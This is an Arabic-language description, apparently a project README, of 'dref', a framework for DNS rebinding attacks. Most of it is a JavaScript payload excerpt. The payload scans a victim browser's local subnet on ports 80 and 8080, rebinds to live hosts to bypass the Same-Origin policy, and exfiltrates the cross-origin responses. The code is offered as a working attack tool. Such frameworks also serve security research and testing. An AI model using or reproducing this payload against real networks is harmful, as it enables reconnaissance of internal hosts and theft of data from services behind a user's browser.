
إطار استغلال إعادة ربط DNS
إطار عمل استغلال إعادة ربط DNS
لم يعد هذا المشروع قيد الصيانة.
يقوم dref بالجزء الأصعب من هجمات إعادة ربط DNS. المقتطف التالي من إحدى الحمولات المضمنة يُظهر الإطار وهو يُستخدم لمسح شبكة فرعية محلية من متصفح مخترق؛ بعد تحديد خدمات الويب النشطة، يواصل تسريب استجابات GET، متجاوزًا سياسة Same-Origin:
// mainFrame() runs first
async function mainFrame () {
// We use some tricks to derive the browser's local /24 subnet
const localSubnet = await network.getLocalSubnet(24)
// We use some more tricks to scan a couple of ports across the subnet
netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
// We launch the rebind attack on live targets
for (let h of results.hosts) {
for (let p of h.ports) {
if (p.open) session.createRebindFrame(h.host, p.port)
}
}
})
}
// rebindFrame() will have target ip:port as origin
function rebindFrame () {
// After this we'll have bypassed the Same-Origin policy
session.triggerRebind().then(() => {
// We can now read the response across origin...
network.get(session.baseURL, {
successCb: (code, headers, body) => {
// ... and exfiltrate it
session.log({code: code, headers: headers, body: body})
}
})
})
}
توجه إلى الـ Wiki للبدء أو اطّلع على dref وهو يهاجم المتصفحات بدون واجهة (headless) لحالة استخدام عملية.
هذا إصدار تطويري - لا تستخدمه في بيئة إنتاج